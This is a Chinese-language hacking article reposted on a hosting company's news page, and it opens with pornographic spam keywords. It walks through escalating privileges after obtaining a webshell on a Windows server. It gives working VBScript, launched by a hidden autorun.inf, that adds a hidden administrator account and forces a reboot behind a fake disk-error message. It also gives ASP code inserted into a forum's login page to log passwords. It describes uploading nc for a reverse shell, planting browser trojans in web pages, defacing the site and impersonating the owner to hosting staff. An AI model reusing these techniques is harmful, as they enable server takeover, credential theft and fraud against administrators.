人妖在线一区,国产日韩欧美一区二区综合在线,国产啪精品视频网站免费,欧美内射深插日本少妇

新聞動態(tài)

另類巧妙的思路:旁門左道的入侵

發(fā)布日期:2021-12-26 13:53 | 文章來源:CSDN
很多的時候,入侵并不是單純靠技術(shù)的,有很多是運氣因素,更重要的是如何對一些擺在你面前的一些安全破綻的攻擊。我很相信安全意識這個東西,當(dāng)一臺服務(wù)器擺在你面前時,大概的看下就知道服務(wù)器的安全到底如何了,特別是對于入侵之后的webshell的提升,更多的依賴于管理員的安全意識。由于本人的技術(shù)不好,不能自己發(fā)現(xiàn)溢出漏洞,所以在入侵時只能搞些旁門左道的東西了。也許這些都是被管理員和高手所不恥的,但是在實際中,這些伎倆的威脅不容忽視,你根本不知道什么時候你的系統(tǒng)就會變得到處是陷阱,加上安全意識薄弱一點的話,對系統(tǒng)的危害還是很大的,我就來說說我平時用到的一些旁門左道的方法吧?。ù蠹乙院蟛灰梢曃揖托辛薧_^)
首先我們獲得一個webshell,因為我說的旁門左道主要就是用在得到webshell之后的權(quán)限提升,webshell相信大家手里都有一大把吧!沒有也沒有關(guān)系,腳本漏洞那么多,看看以前的文章自己上網(wǎng)找找吧!^_^。得到webshell以后,我一般都是先看看系統(tǒng)的進(jìn)程列表,砍客的木馬和最近的海洋木馬都有這個功能。我用的就是海洋的修改版,可以看到很詳細(xì)的信息,你沒有這樣的木馬的話也沒有關(guān)系,我這里有別人給我的一段代碼,放到服務(wù)器上就可以看進(jìn)程了: <%
dim obj //定義變量//
for each obj in getObject("WinNT://.") //循環(huán)取得系統(tǒng)本機對象//
err.clear //錯誤處理//
%>
<%=obj.Name%> //顯示對象Name屬性,即顯示系統(tǒng)用戶組//
<%if err then
else
%>(<%=obj.DisplayName%>)<%end if%> //顯示當(dāng)前服務(wù)名//
<br><%=obj.path%> //顯示當(dāng)前服務(wù)程序路徑// 保存為asp文件訪問看看吧!如圖一。這里要仔細(xì)看看,服務(wù)都裝在哪里,還有哪些服務(wù),這樣就可以知道管理員的水平到底怎么樣了。如果你什么也沒有得到的話說明管理員不是很差勁,就要小心了!呵呵,服務(wù)都裝在默認(rèn)的路徑下啊,默認(rèn)Guest沒有什么權(quán)限,不過如果你發(fā)現(xiàn)有不在默認(rèn)路徑下的服務(wù),就試著執(zhí)行命令看看,可以執(zhí)行的話就可以把我們自己的程序傳上去改掉服務(wù)的名字,將自己的程序替換成他的(這里要求對方的程序路徑下是默認(rèn)的權(quán)限哦)。windows默認(rèn)是不允許刪除正在執(zhí)行的文件但是可以改名,呵呵,這里只要服務(wù)器重起我們的程序就可以執(zhí)行了,當(dāng)然是以犧牲對方的服務(wù)為代價的了,建議搞瑞星之類的殺毒軟件。這里因為是要等服務(wù)器重起,但是一周左右都會重起的,概率很大,windows太不穩(wěn)定了。呵呵,陰險吧,一切都是為了權(quán)限,不然怎么叫旁門左道呢?如果你真的比較性急,我也不建議你跑去D人家,是托管主機的話直接冒充管理員讓托管機房的人重起比較好,成功率據(jù)說很高的?。∏疤崾悄阋至私鈱Ψ?。當(dāng)然,如果機器有Server-u并且版本比較低的話就不用那么麻煩了,如何提權(quán)就看看以前的文章吧,我就不多說了。但是看看這里,我們的情況不怎么好,看看服務(wù)的路徑就知道,就是幾個防火墻和殺毒軟件,全部默認(rèn)啊,可以執(zhí)行命令也沒有辦法替換服務(wù)了。我們再看看,好多默認(rèn)的服務(wù)都沒有關(guān),這是一個對安全重視的網(wǎng)管所不會做的,至少那個什么ClipBook服務(wù)就是個例子(排除對自己超級自信的網(wǎng)管!)??梢钥闯鏊陌踩庾R至少不是那么到位,我們肯定有空子可以鉆的,哈哈!接著往后看吧,用Fso查看磁盤發(fā)現(xiàn)都可以瀏覽,還可寫,看來都是默認(rèn)的設(shè)置,還可以執(zhí)行命令,網(wǎng)管果然比較$#%$@$#%啊!其實開始我就應(yīng)該知道,因為他的web頁面和數(shù)據(jù)庫都是默認(rèn)設(shè)置,我就是那樣得到webshell的!基本可以確定我們的對手是怎么樣的一個人了!呵呵。
但是好象還是沒有什么用,可以執(zhí)行命令,將nc傳上去還可以得到了反向的cmdshell,亂轉(zhuǎn)悠但還是沒有什么思路!管理員不懂做安全配置但是微軟的補丁不知道為什么打得很全,本地的溢出都不好用!郁悶。那就再在他的硬盤里看看,嘿嘿,根目錄可寫啊,想起什么了?記不記得系統(tǒng)默認(rèn)的那個autorun.inf啊,放在磁盤根目錄,雙擊的話會執(zhí)行那個指定程序的呵,我們就放個autorun.inf上去,哈哈。如圖二。這樣他的硬盤下就有我們放置的陷阱了,等管理員來了。當(dāng)然,不能直接用autonrun.inf運行我們的木馬,這樣管理員打不開硬盤一定會奇怪的,我寫了個隱蔽點的代碼: Dim fso, MyFile //定義變量//
Set fso = createObject("Scripting.FileSystemObject") //取得Fso對象//
Set MyFile = fso.GetFile("d:\autorun.inf") //打開文件d:\autorun.inf//
MyFile.delete //刪除文件// dim sh //定義變量//
set sh=createobject("wscript.shell") //創(chuàng)建對象//
sh.run "net user jnc lxfxd /add",0 //Wsh執(zhí)行命令添加帳戶jnc//
sh.run "net localgroup administrators jnc /add",0 //將jnc帳戶加為管理員//
sh.run "attrib h s d:\run.vbs",0 //將我們的run.vbs加上系統(tǒng)隱藏屬性//
sh.run "shutdown -r -t 30 -c windows讀盤錯誤,需要重新啟動以讀取分區(qū)表.",0 //重起機器,后面的是迷惑管理員// 保存為run.vbs,與后面的autorun.inf設(shè)置為隱藏之后一起放到磁盤根目錄下。如果是2000,可以把shutdown.exe傳上去,這些代碼的意思是先刪除autotun.inf,然后加jnc為管理員,最后彈出對話框,機器重起,重起后什么痕跡都沒有了,除了多個管理員用戶。提示信息可以自己改,迷惑性越大越好!在autorun.inf里寫上下面的代碼:
[autorun] OPEN=wscript run.vbs 一定要是wscript.exe啊,不然有黑的對話框出來就麻煩了。應(yīng)該有高手知道如何用腳本打開磁盤的,但是我不會寫,不過這樣已經(jīng)夠狠的了,想想現(xiàn)在有哪個打開磁盤時不是雙擊??!
除了這個,還有個東西很值得提下,就是以前的黑x介紹的那個目錄欺騙工具,管理員誤以為是文件夾就可以加帳戶的那個。不過我得到的程序運行程序成功后總有個bat文件,刪不掉,是人都看出來有鬼!我就不要運行程序的功能了,直接傳到管理員去得多的地方,嘿嘿,根目錄下放一個,網(wǎng)站目錄放一個,……。如圖三,也不要太多了,放到管理員眼皮底下等他運行就可以了,我是不知道如何編程啊,不然寫個名字誘惑性更大的程序效果更好。我們有帳戶又有可以執(zhí)行命令的cmdshell,沒有3389也可以用runas命令啊,這機器就是我們的了!可是這樣安全意識的管理員一般很懶,不一定會經(jīng)常上線,不然不會這么多漏子。嘿嘿,不要著急,等什么都弄完了再想法讓他上線檢查自己的電腦,這樣才可以運行我們的程序。
再找找其他有不有空子可以鉆。去看看他網(wǎng)站上有什么東西吧,他這樣的管理員各個地方用的密碼不會都不一樣吧?網(wǎng)站上有個動網(wǎng)sp2的,把數(shù)據(jù)庫由asp的copy成mdb的下載下來看看。在Dv_log里沒有找到密碼,看到了注冊時間最早的那個家伙(這個當(dāng)然就是管理員了自己?。┑拿艽a,拿下來跑跑??墒前胩煲矝]有跑出來啊,急!我破解不出來我還不會等著你往我家里送?。扛纱嗾业搅薭bs的login.asp在里面加了點東西: <%
dim Name,password,fso,file //定義后面要用到的變量//
Name = Request("username") //取得瀏覽器傳過來的username變量//
Password = Request("password") //取得瀏覽器傳過來的Password變量//
Const ForReading = 1, ForWriting = 2, ForAppending = 8 //定義后面寫文件的參數(shù)//
Set fso = Server.createObject("Scripting.FileSystemObject") //取得Fso對象,準(zhǔn)備寫文件//
Const path = "D:\mir3\bbs\admin_list.asp" //定義要寫的文件路徑//
set file=fso.opentextfile(path, ForAppending, TRUE) //取得文件對象//
file.write(Name) & " " //寫取得的用戶名//
file.write(Password) & "||" //寫取得的密碼,并用||分隔開//
file.close //關(guān)閉文件//
set file = nothing //釋放變量//
set fso = nothing //釋放變量//
%> 注意的是里面request的變量,具體的字段自己改!還有后面你要存放的文件地址,這個也根據(jù)情況自己填了,以后經(jīng)常來看看得到的東西就行了,我比較關(guān)注的是admin!如圖四。又一個個陷阱挖好了,等管理員鉆了。可是好象不知道他什么時候登陸呢,我干脆去當(dāng)會壞人,發(fā)了幾個人身攻擊的帖子,灌了一會惡意的水就不信你管理員熬得住不上來刪帖子?。ú皇俏业谋疽猓蠹以彛。┖俸?
再轉(zhuǎn)悠了幾下子,發(fā)現(xiàn)C:\Program Files下有3721,乖乖,難道服務(wù)器還有人拿來上網(wǎng)啊?不過也不排除那種可能,二話不說,找人要了最新的網(wǎng)頁木馬的代碼,找網(wǎng)站幾個關(guān)鍵的頁面插進(jìn)去,如圖五哈哈,又是一個陷阱,只要你打開Ie上網(wǎng)!再找找,發(fā)現(xiàn)這個管理員還好,服務(wù)器上不聊QQ,也沒有什么游戲,要不然我們又可以給他捆上個東西,捆什么?當(dāng)然是木馬了!我還真遇到有人在服務(wù)器聊QQ玩連連看外加看少兒不易的東西,呵呵,這樣的機器要是還搞不定就真是你的問題了。
這個機器上基本上已經(jīng)到處是陷阱了,只等管理員上線了,我可等不急了,催催他吧!拿出經(jīng)典的黑站圖片,插入網(wǎng)頁木馬在里面替換主頁黑了他?。ㄟ@里我了解管理員的水平所以這么做的,大家千萬不要模仿?。┚偷人l(fā)現(xiàn)了,我們的陷阱可是在等他的?。】墒沁@個網(wǎng)站好象人氣不怎么好,等了半天也沒有人清除黑頁。算了,中招是遲早的事了,你要是沒有耐心在網(wǎng)站上找下他的QQ告訴他,注意社會工程學(xué)的應(yīng)用啊,呵呵。
這里還要說點其他的,得到webshell和權(quán)限有更好的辦法,上那個可以查詢網(wǎng)站信息的站點,http://www.webhosting.info查詢下他的信息,如圖六,注冊個相似的郵箱,或者直接打電話,然后冒充下站長說自己的密碼丟了,偶不怎么擅長這個,所以都是聽人家說的,可是上次跟小默上電信機房發(fā)現(xiàn)那里檢查真不是怎么嚴(yán),簽個名就讓進(jìn)去,進(jìn)去之后還什么都不管。一些服務(wù)器就那樣開著,管理員已經(jīng)登陸但是人不在,還有一些很重要的服務(wù)器都可以直接操作的,真不知道放個馬到網(wǎng)關(guān)上去會怎么樣,這里說的東西或許有些偏離黑客的技術(shù)了,但是,你敢保證這些旁門左道不會威脅到你的主機的安全?意識很重要,安全再怎么小心都不為過,好了,我就說到這里

版權(quán)聲明:本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像,否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來,僅供學(xué)習(xí)參考,不代表本站立場,如有內(nèi)容涉嫌侵權(quán),請聯(lián)系alex-e#qq.com處理。

相關(guān)文章

實時開通

自選配置、實時開通

免備案

全球線路精選!

全天候客戶服務(wù)

7x24全年不間斷在線

專屬顧問服務(wù)

1對1客戶咨詢顧問

在線
客服

在線客服:7*24小時在線

客服
熱線

400-630-3752
7*24小時客服服務(wù)熱線

關(guān)注
微信

關(guān)注官方微信
頂部